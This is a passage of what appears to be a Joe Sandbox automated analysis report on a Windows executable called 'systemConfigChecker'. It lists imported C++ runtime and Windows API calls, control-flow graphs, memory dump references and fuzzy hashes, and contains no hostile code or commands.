          • ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF6B270166D
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF6B270169B
          • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2701782
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B270178C
            • Part of subcall function 00007FF6B2709820: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6B270986D
            • Part of subcall function 00007FF6B2709820: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6B270988D
            • Part of subcall function 00007FF6B2709820: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6B270989D
            • Part of subcall function 00007FF6B2709820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6B27098FD
            • Part of subcall function 00007FF6B2709820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6B2709926
            • Part of subcall function 00007FF6B2709820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6B270995D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$?sputc@?$basic_streambuf@$??6?$basic_ostream@?good@ios_base@std@@V01@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@?flush@?$basic_ostream@_?setw@std@@D@std@@@1@_J@1@_Smanip@_U?$_U?$char_traits@_V12@V21@@V?$basic_streambuf@Vios_base@1@W@std@@@std@@isalnum
          • String ID: _$~
          • API String ID: 2365617078-3740536066
          • Opcode ID: 8f68b8c8258da5cd91e34a757c6f19a2daf3b84494c5e989e5e3b3f3a5cd17a5
          • Instruction ID: 51588c973e287cc9942c6f36a489c46982d8297e22e201d82af43c2d047cdbb7
          • Opcode Fuzzy Hash: 8f68b8c8258da5cd91e34a757c6f19a2daf3b84494c5e989e5e3b3f3a5cd17a5
          • Instruction Fuzzy Hash: 3E718132A18A8186EB11CF59E8502AFB7A0FB86B98F444136DF4D93768DFBDD449C704

          Control-flow Graph

          APIs
          • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B2701881), ref: 00007FF6B2708A20
          • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6B2708A3F
          • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B2708A71
          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6B2708A8C
          • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF6B2708AB6
          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6B2708AD3
          • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6B2708AFA
          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z.MSVCP140 ref: 00007FF6B2708B21
          • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF6B2708B45
            • Part of subcall function 00007FF6B2709FB0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6B2709FDD
            • Part of subcall function 00007FF6B2709FB0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6B2709FF7
            • Part of subcall function 00007FF6B2709FB0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6B270A029
            • Part of subcall function 00007FF6B2709FB0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6B270A054
            • Part of subcall function 00007FF6B2709FB0: std::_Facet_Register.LIBCPMT ref: 00007FF6B270A06D
            • Part of subcall function 00007FF6B2709FB0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6B270A08C
          • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6B2708B5A
          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6B2708B71
          • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6B2708BB0
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@_Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@H001@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@_U_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@W@std@@@std@@_get_stream_buffer_pointersstd::_
          • String ID:
          • API String ID: 3818078705-0
          • Opcode ID: f35c13acc3d87238f3b7b1e58bee0d7e5fa0656072ccc1d0c3963a8712f1ca8d
          • Instruction ID: a09af43967429975d7fee0fe81163bd77f9486b53d24168d12048c4373c07d5c
          • Opcode Fuzzy Hash: f35c13acc3d87238f3b7b1e58bee0d7e5fa0656072ccc1d0c3963a8712f1ca8d
          • Instruction Fuzzy Hash: 7D515F32608B8586EB05CF29E55436A77E1FB86B89F044435DB8D83B24DF7DE06AC748

          Control-flow Graph

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$EnumProcessmemset$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BaseCloseD@std@@@1@@HandleModuleModulesNameOpenProcessesV?$basic_streambuf@memcpy
          • String ID:
          • API String ID: 3444793848-0
          • Opcode ID: 176818b9055dcd18f90ea10054250413a06e4f11656990404fb4c7ffa63b3a2d
          • Instruction ID: 8d95018ccc6590bad85a6bc0dc796658832288f98f85eb4479b853269a86f7fe
          • Opcode Fuzzy Hash: 176818b9055dcd18f90ea10054250413a06e4f11656990404fb4c7ffa63b3a2d
          • Instruction Fuzzy Hash: 6A719272A18B8586EB21CF29D4502AE73A0FB86B88F504136DF8D93B58DF7DD189C704

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1232 7ff6b2709c10-7ff6b2709c3f 1233 7ff6b2709c40-7ff6b2709c48 1232->1233 1233->1233 1234 7ff6b2709c4a-7ff6b2709c59 1233->1234 1235 7ff6b2709c5b-7ff6b2709c5e 1234->1235 1236 7ff6b2709c65 1234->1236 1235->1236 1238 7ff6b2709c60-7ff6b2709c63 1235->1238 1237 7ff6b2709c67-7ff6b2709c77 1236->1237 1239 7ff6b2709c79-7ff6b2709c7f 1237->1239 1240 7ff6b2709c80-7ff6b2709c92 ?good@ios_base@std@@QEBA_NXZ 1237->1240 1238->1237 1239->1240 1241 7ff6b2709cc4-7ff6b2709cca 1240->1241 1242 7ff6b2709c94-7ff6b2709ca3 1240->1242 1246 7ff6b2709cd6-7ff6b2709cef 1241->1246 1247 7ff6b2709ccc-7ff6b2709cd1 1241->1247 1244 7ff6b2709cc2 1242->1244 1245 7ff6b2709ca5-7ff6b2709ca8 1242->1245 1244->1241 1245->1244 1248 7ff6b2709caa-7ff6b2709cc0 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1245->1248 1250 7ff6b2709d1f-7ff6b2709d3a ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1246->1250 1251 7ff6b2709cf1-7ff6b2709cf4 1246->1251 1249 7ff6b2709d8e-7ff6b2709dac ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1247->1249 1248->1241 1254 7ff6b2709db8-7ff6b2709dc8 1249->1254 1255 7ff6b2709dae-7ff6b2709db7 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1249->1255 1252 7ff6b2709d67 1250->1252 1253 7ff6b2709d3c 1250->1253 1251->1250 1256 7ff6b2709cf6-7ff6b2709d11 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1251->1256 1258 7ff6b2709d6a 1252->1258 1257 7ff6b2709d40-7ff6b2709d43 1253->1257 1259 7ff6b2709dca-7ff6b2709dd0 1254->1259 1260 7ff6b2709dd1-7ff6b2709deb 1254->1260 1255->1254 1261 7ff6b2709d1a-7ff6b2709d1d 1256->1261 1262 7ff6b2709d13-7ff6b2709d18 1256->1262 1263 7ff6b2709d6e-7ff6b2709d7e 1257->1263 1264 7ff6b2709d45-7ff6b2709d60 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1257->1264 1258->1263 1259->1260 1261->1251 1262->1258 1263->1249 1264->1252 1265 7ff6b2709d62-7ff6b2709d65 1264->1265 1265->1257
          APIs
          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6B2709C8A
          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6B2709CAA
          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6B2709CBA
          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF6B2709D07
          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6B2709D31
          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF6B2709D56
          • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6B2709D9D
          • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6B2709DA4
          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6B2709DB1
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
          • String ID:
          • API String ID: 3397294066-0
          • Opcode ID: 9340df2d7b22759f6c791cb39ea6ec1440f113354fa38e5be513034bf6c266e4
          • Instruction ID: a32688eeafba83e71467b0fe1cd8232f53203ba93c7df19c85c7a54a7eab17cd
          • Opcode Fuzzy Hash: 9340df2d7b22759f6c791cb39ea6ec1440f113354fa38e5be513034bf6c266e4
          • Instruction Fuzzy Hash: AD510232609A41C2EB258F1ED59023AB7E0FB86F99B15C531CF5E837A0CF7AD44A8304

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1267 7ff6b27099f0-7ff6b2709a19 1268 7ff6b2709a20-7ff6b2709a27 1267->1268 1268->1268 1269 7ff6b2709a29-7ff6b2709a38 1268->1269 1270 7ff6b2709a3a-7ff6b2709a3d 1269->1270 1271 7ff6b2709a44 1269->1271 1270->1271 1272 7ff6b2709a3f-7ff6b2709a42 1270->1272 1273 7ff6b2709a46-7ff6b2709a56 1271->1273 1272->1273 1274 7ff6b2709a58-7ff6b2709a5e 1273->1274 1275 7ff6b2709a5f-7ff6b2709a71 ?good@ios_base@std@@QEBA_NXZ 1273->1275 1274->1275 1276 7ff6b2709aa3-7ff6b2709aa9 1275->1276 1277 7ff6b2709a73-7ff6b2709a82 1275->1277 1278 7ff6b2709aab-7ff6b2709ab0 1276->1278 1279 7ff6b2709ab5-7ff6b2709ac8 1276->1279 1281 7ff6b2709aa1 1277->1281 1282 7ff6b2709a84-7ff6b2709a87 1277->1282 1283 7ff6b2709b6d-7ff6b2709b8b ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1278->1283 1284 7ff6b2709aca 1279->1284 1285 7ff6b2709afd-7ff6b2709b18 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1279->1285 1281->1276 1282->1281 1286 7ff6b2709a89-7ff6b2709a9f ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1282->1286 1287 7ff6b2709b97-7ff6b2709ba7 1283->1287 1288 7ff6b2709b8d-7ff6b2709b96 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1283->1288 1289 7ff6b2709ad0-7ff6b2709ad3 1284->1289 1290 7ff6b2709b46 1285->1290 1291 7ff6b2709b1a 1285->1291 1286->1276 1292 7ff6b2709ba9-7ff6b2709baf 1287->1292 1293 7ff6b2709bb0-7ff6b2709bc4 1287->1293 1288->1287 1289->1285 1294 7ff6b2709ad5-7ff6b2709aef ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1289->1294 1296 7ff6b2709b49 1290->1296 1295 7ff6b2709b20-7ff6b2709b23 1291->1295 1292->1293 1298 7ff6b2709af8-7ff6b2709afb 1294->1298 1299 7ff6b2709af1-7ff6b2709af6 1294->1299 1297 7ff6b2709b4d-7ff6b2709b5d 1295->1297 1300 7ff6b2709b25-7ff6b2709b3f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1295->1300 1296->1297 1297->1283 1298->1289 1299->1296 1300->1290 1302 7ff6b2709b41-7ff6b2709b44 1300->1302 1302->1295
          APIs
          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A69
          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A89
          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A99
          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709AE6
          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B0F
          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B36
          • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B7C
          • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B83
          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B90
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
          • String ID:
          • API String ID: 1135186806-0
          • Opcode ID: 5814e694fa5f361751dc898f9d5e21bc3f4dd92118ae153b6ae81dfab933b90a
          • Instruction ID: 7684aa0eb165f36041df942c41d5b3ad32f37c7215225267c394cec9bb67b207
          • Opcode Fuzzy Hash: 5814e694fa5f361751dc898f9d5e21bc3f4dd92118ae153b6ae81dfab933b90a
          • Instruction Fuzzy Hash: C0510622609941C2EB158F1ED59423AA7E0FF86F99F15C531CB5E837A1CFBAD446C348

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1303 7ff6b270b080-7ff6b270b0ba 1304 7ff6b270b0c6 1303->1304 1305 7ff6b270b0bc-7ff6b270b0bf 1303->1305 1307 7ff6b270b0c8-7ff6b270b0d8 1304->1307 1305->1304 1306 7ff6b270b0c1-7ff6b270b0c4 1305->1306 1306->1307 1308 7ff6b270b0da-7ff6b270b0e0 1307->1308 1309 7ff6b270b0e1-7ff6b270b0f3 ?good@ios_base@std@@QEBA_NXZ 1307->1309 1308->1309 1310 7ff6b270b125-7ff6b270b12b 1309->1310 1311 7ff6b270b0f5-7ff6b270b104 1309->1311 1315 7ff6b270b137-7ff6b270b150 1310->1315 1316 7ff6b270b12d-7ff6b270b132 1310->1316 1313 7ff6b270b106-7ff6b270b109 1311->1313 1314 7ff6b270b123 1311->1314 1313->1314 1317 7ff6b270b10b-7ff6b270b121 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1313->1317 1314->1310 1319 7ff6b270b152-7ff6b270b155 1315->1319 1320 7ff6b270b184-7ff6b270b19f ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1315->1320 1318 7ff6b270b1ef-7ff6b270b20d ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1316->1318 1317->1310 1323 7ff6b270b219-7ff6b270b228 1318->1323 1324 7ff6b270b20f-7ff6b270b218 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1318->1324 1319->1320 1325 7ff6b270b157-7ff6b270b172 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1319->1325 1321 7ff6b270b1c8-7ff6b270b1cb 1320->1321 1322 7ff6b270b1a1-7ff6b270b1a4 1320->1322 1329 7ff6b270b1cf-7ff6b270b1df 1321->1329 1328 7ff6b270b1a6-7ff6b270b1c1 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1322->1328 1322->1329 1330 7ff6b270b22a-7ff6b270b230 1323->1330 1331 7ff6b270b231-7ff6b270b24b 1323->1331 1324->1323 1326 7ff6b270b17f-7ff6b270b182 1325->1326 1327 7ff6b270b174-7ff6b270b17d 1325->1327 1326->1319 1327->1322 1328->1321 1332 7ff6b270b1c3-7ff6b270b1c6 1328->1332 1329->1318 1330->1331 1332->1322
          APIs
          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6B2701AD2), ref: 00007FF6B270B0EB
          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6B2701AD2), ref: 00007FF6B270B10B
          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6B2701AD2), ref: 00007FF6B270B11B
          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6B2701AD2), ref: 00007FF6B270B168
          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6B2701AD2), ref: 00007FF6B270B196
          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6B2701AD2), ref: 00007FF6B270B1B7
          • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6B2701AD2), ref: 00007FF6B270B1FE
          • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6B2701AD2), ref: 00007FF6B270B205
          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6B2701AD2), ref: 00007FF6B270B212
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
          • String ID:
          • API String ID: 3397294066-0
          • Opcode ID: d4daf986c591b3d0968fda3093ef46c4df527e5844f88b62d69c232397f5e4b9
          • Instruction ID: 3a2df819140c1fa04dd2082373f63ba5a4edea9567b680c27e5fe0559c00734e
          • Opcode Fuzzy Hash: d4daf986c591b3d0968fda3093ef46c4df527e5844f88b62d69c232397f5e4b9
          • Instruction Fuzzy Hash: 7B511232608A4182EB25CF1DE59463AA7E1FF86F89B159431CF4E83764CF7ED94A8304
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
          • String ID:
          • API String ID: 1133592946-0
          • Opcode ID: c72b868e27cb6210fe93b8e03fa8e66d7301bfa151cb37a32990f55088ab15a1
          • Instruction ID: 74b084c599cee4090dc019497b892bf1dd30298a85963195487abbc1314c4e1b
          • Opcode Fuzzy Hash: c72b868e27cb6210fe93b8e03fa8e66d7301bfa151cb37a32990f55088ab15a1
          • Instruction Fuzzy Hash: 7E315D21A1810381FA16AB6D94553BB23D2AF4778CF44653AE70DC72DBCEAEB54D830D
          APIs
          • memset.VCRUNTIME140 ref: 00007FF6B2703FAC
            • Part of subcall function 00007FF6B2706810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B270684A
            • Part of subcall function 00007FF6B2706810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6B2706866
            • Part of subcall function 00007FF6B2706810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B2706898
          • NetGetJoinInformation.NETAPI32 ref: 00007FF6B2703FC8
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2704071
          • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2704143
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B270414D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@InformationJoinV?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemset
          • String ID: Domain:
          • API String ID: 3601429228-3214134553
          • Opcode ID: f59fd3a113323076913b019393b9ca434df01870f7828c91c6ce386d03f2384e
